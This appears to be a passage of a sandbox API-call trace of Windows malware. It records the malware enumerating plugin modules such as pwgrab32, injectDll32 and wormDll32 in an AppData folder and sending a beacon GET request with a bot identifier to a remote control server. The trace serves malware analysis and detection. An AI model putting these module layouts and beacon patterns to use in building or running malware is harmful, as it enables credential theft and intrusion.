	[0255.124] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0255.124] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x700
	[0255.124] GetFileTime (in: hFile=0x700, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x7cece240, dwHighDateTime=0x1d50a6a)) returned 1
	[0255.126] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0255.126] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x700
	[0255.126] GetFileTime (in: hFile=0x700, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) returned 1
	[0255.126] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0255.126] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x700
	[0255.126] GetFileTime (in: hFile=0x700, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a)) returned 1
	[0255.126] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0255.126] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x700
	[0255.127] GetFileTime (in: hFile=0x700, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a)) returned 1
	[0255.127] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0255.127] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0255.127] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0255.127] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0255.127] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b6b80
	[0255.127] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0255.127] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0255.127] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff90
	[0255.127] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21c5d8
	[0255.127] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0255.127] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0255.127] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22fff90, Size=0x10) returned 0x22ffa20
	[0255.127] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d2c8
	[0255.127] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0255.127] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e5ad7a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6e5ad7a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6e5d3900, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x48b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32", cAlternateFileName="")) returned 1
	[0255.127] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa20, Size=0x10) returned 0x22fff90
	[0255.127] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21e408
	[0255.127] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6eff1680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32_configs", cAlternateFileName="PSFIN3~1")) returned 1
	[0255.127] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0255.127] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22fff90, Size=0x10) returned 0x22ffa20
	[0255.127] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d718
	[0255.127] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0255.127] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f7ba00, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70f7ba00, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="shareDll32", cAlternateFileName="SHARED~1")) returned 1
	[0255.128] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa20, Size=0x20) returned 0x27c2f10
	[0255.128] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d4f0
	[0255.128] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
	[0255.128] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27c2f10, Size=0x20) returned 0x27c4130
	[0255.128] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21dfb8
	[0255.128] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 1
	[0255.128] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27c4130, Size=0x20) returned 0x27c2f10
	[0255.128] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21db68
	[0255.128] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 0
	[0255.128] GetLastError () returned 0x12
	[0255.128] FindClose (in: hFindFile=0x22b6b80 | out: hFindFile=0x22b6b80) returned 1
	[0255.128] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0255.128] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0255.128] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0255.128] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x700
	[0255.128] GetFileTime (in: hFile=0x700, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0255.128] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0255.128] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0255.128] GetFullPathNameW (in: lpFileName="Data\\networkDll32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32", lpFilePart=0x0) returned 0x42
	[0255.128] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x700
	[0255.128] GetFileTime (in: hFile=0x700, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0255.128] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32") returned="psfin32"
	[0255.129] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0255.129] GetFullPathNameW (in: lpFileName="Data\\psfin32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32", lpFilePart=0x0) returned 0x3d
	[0255.129] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x700
	[0255.129] GetFileTime (in: hFile=0x700, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x6e5d3900, dwHighDateTime=0x1d50a6a)) returned 1
	[0255.129] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0255.129] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0255.129] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0255.129] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x700
	[0255.129] GetFileTime (in: hFile=0x700, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0255.129] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32") returned="shareDll32"
	[0255.129] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0255.129] GetFullPathNameW (in: lpFileName="Data\\shareDll32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32", lpFilePart=0x0) returned 0x40
	[0255.129] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\sharedll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x700
	[0255.129] GetFileTime (in: hFile=0x700, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x70fa1b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0255.129] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0255.129] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0255.129] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0255.130] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x700
	[0255.130] GetFileTime (in: hFile=0x700, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0255.130] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32") returned="wormDll32"
	[0255.130] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0255.130] GetFullPathNameW (in: lpFileName="Data\\wormDll32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32", lpFilePart=0x0) returned 0x3f
	[0255.130] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\wormdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x700
	[0255.130] GetFileTime (in: hFile=0x700, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a)) returned 1
	[0255.130] WinHttpCloseHandle (hInternet=0x27e7968) returned 1
	[0255.130] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0255.130] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/e0GcsEbwEXqDVn3N/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7968
	[0255.130] WinHttpSetOption (hInternet=0x27e7968, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0255.130] WinHttpSendRequest (hRequest=0x27e7968, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0255.827] WinHttpReceiveResponse (hRequest=0x27e7968, lpReserved=0x0) returned 1
	[0255.828] WinHttpQueryHeaders (in: hRequest=0x27e7968, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0255.828] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x3) returned 1
	[0255.828] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa20
	[0255.828] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x22ffa20, dwNumberOfBytesToRead=0x3, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x22ffa20*, lpdwNumberOfBytesRead=0x128bdc*=0x3) returned 1
	[0255.828] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0255.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ffa20, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3
	[0255.828] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff90
	[0255.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ffa20, cbMultiByte=3, lpWideCharStr=0x22fff90, cchWideChar=3 | out: lpWideCharStr="/1/") returned 3
	[0255.829] StrStrIW (lpFirst="/1/", lpSrch="/") returned="/1/"
	[0255.829] StrStrIW (lpFirst="1/", lpSrch="/") returned="/"
